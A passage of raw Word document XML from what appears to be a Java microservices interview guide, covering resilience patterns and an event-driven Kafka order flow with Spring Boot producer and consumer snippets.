      </w:r>
    </w:p>
    <w:p w14:paraId="774638E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setConnectTimeout(Duration.ofSeconds(2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C01CF1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    .setReadTimeout(Duration.ofSeconds(3));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C723876"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FD7191">
          <v:rect id="_x0000_i3096" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54ECECE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Fallback Methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2049DC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ovide default response or alternative logic when failure occurs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C97082A"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DFA8A82">
          <v:rect id="_x0000_i3097" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5921182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 with Health Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A9B6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service discovery and automatic removal of unhealthy services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACF825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A09E55">
          <v:rect id="_x0000_i3098" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C7631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Asynchronous Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3191B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decoupling services to avoid failure propagation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B01F4D"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FE6D528">
          <v:rect id="_x0000_i3099" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CADB68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Graceful Degradation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F40F01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how limited functionality or cached responses when a service fails instead of full outage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946F33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58C34CC">
          <v:rect id="_x0000_i3100" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDC83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mp; Alerting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A27DA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Prometheus + Grafan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monitor:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E305ED"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rror rates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716709F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Latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18F75E9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ry/circuit breaker states</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F5AB4A"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lert on anomalies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB9123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26B13">
          <v:rect id="_x0000_i3101" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FBD99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Mesh (Istio, Linkerd)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD8208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ilt-in support for retries, timeouts, circuit breaking, load balancing, etc., outside of app code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376468E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28036">
          <v:rect id="_x0000_i3102" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="221956E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767"/>
        <w:gridCol w:w="3341"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="28FC5F1A" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4127FF30"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echanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3675A66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Tool/Pattern</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A7DD90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Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="3E50ACB4" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74D935B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 Breaker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BEDD1E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D9AFFB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event cascade failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="25D2CF88" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37FE49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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="314C6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Spring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5B0339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matic retry on transient failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="07D9D867" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23706D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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2B1FBA1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B33A8A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Isolate failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="25F28E80" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B4F90B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 Limiter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="466F2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3122FA8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hrottle excessive load</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="5770AFA6" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="65517C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llback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0220FB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ode fallback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4666239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grade gracefully</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="60D5E08C" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="190F68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imeout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F39C6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HTTP Client config</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6672E55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il fast on slow services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="683786E9" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08144AC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sync Messaging</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D8682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RabbitMQ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7C4B1A2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ing and resilience</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="46B8519C" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="353F87C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onitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61482BF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ometheus, ELK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28CC752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tect &amp; act on failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6D714BD9" w14:textId="2DF5BE38"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3103" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F84489" w14:textId="6B61FCCD" w:rsidR="001659D4" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="732" w:name="_Toc197867946"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can you explain Event driven microservice and how you have used it in your project</w:t>
      </w:r>
      <w:r w:rsidR="001659D4" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="732"/>
    </w:p>
    <w:p w14:paraId="5562E1A7" w14:textId="6319DD02" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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vent-Driven Microservices – Explained with Usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D77ACDE"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70315C6">
          <v:rect id="_x0000_i3104" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="032F9B6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What is Event-Driven Microservices?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5468FD8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An </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Event-Driven Microservice</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> architecture uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> where services </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>publish and consume events</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> instead of making direct API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD318B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672FE9">
          <v:rect id="_x0000_i3105" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F67C17A"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t Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A764A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 Service</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Publishes an event (e.g., OrderCreated, PaymentFailed) to a </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>message broker</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2713E63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xml:space="preserve">: Message queue (like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache 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WS SNS/SQS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) acts as a middle layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41729E5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 Service(s)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Subscribes to relevant events and processes them asynchronously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653281A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A5D577">
          <v:rect id="_x0000_i3106" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA5712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621"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="0D6FC560" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EF3FFC7"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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="61A837C1"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="23CD1C55" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="13F3BAA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ent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="084D98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 message representing a state change.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="550F6930" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EC4A4A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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28EE326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ends (publishes) event messages.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="31648BDE" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B4327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Broker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6A5DF3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iddleware (Kafka, RabbitMQ, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25965" w:rsidRPr="00FA65E9" w14:paraId="0C88854B" w14:textId="77777777" w:rsidTr="00F25965">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79568E4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w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="089D105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ceives and processes events.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C6E3DC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DFAE536">
          <v:rect id="_x0000_i3107" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C43CEBB"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 used it in my Project:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305ED000"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Use Case: E-commerce Platform</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405E515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ervices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6339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p>
    <w:p w14:paraId="62911F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p>
    <w:p w14:paraId="746FD2A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p>
    <w:p w14:paraId="00F0DE4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p>
    <w:p w14:paraId="338D3293"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Flow:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD9FB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r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> places an order → Publishes OrderCreated event to Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A0E13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r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listens for OrderCreated → Reserves stock → Publishes InventoryReserved event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EC972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r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listens → Tries to deduct money → Publishes PaymentSuccess or PaymentFailed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C6F986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r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listens to all events and sends email/SMS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703643BD"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Technology Used:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD19CD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Apache Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A2B8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pring Cloud Stream</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Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E4FB5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essage format</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: JSON with event types.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BFB6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381E30">
          <v:rect id="_x0000_i3108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25383F0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xample Event:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6307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0DAE3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eventType": "OrderCreated",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE1CA0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orderId": "12345",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D112C8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userId": "u789",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E67F7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items": [ { "productId": "p1", "qty": 2 } ],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B54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timestamp": "2025-04-20T10:30:00Z"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B872EF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5C208B5F"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CEADB8C">
          <v:rect id="_x0000_i3109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="678FA1B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de Snippet: (Spring Boot + Kafka)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3BBA08"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Producer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5C827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wired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0727D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ivate KafkaTemplate&lt;String, OrderEvent&gt; kafkaTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8F430E" w14:textId="77777777" w:rsidR="00F25965" w:rsidRPr="00FA65E9" w:rsidRDefault="00F25965" w:rsidP="00FA65E9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="360C7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publishOrderEvent(OrderEvent event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1653979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kafkaTemplate.send("order-events", event);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEB87F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CC288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nsumer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183CCC4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Listener(topics = "order-events", groupId = "inventory-group")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7530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consumeOrderEvent(OrderEvent event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC4639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process inventory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722E612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78526E1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8F567F9">
          <v:rect id="_x0000_i3110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D56162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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9C15F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ed services</w:t>
      </w:r>
    </w:p>
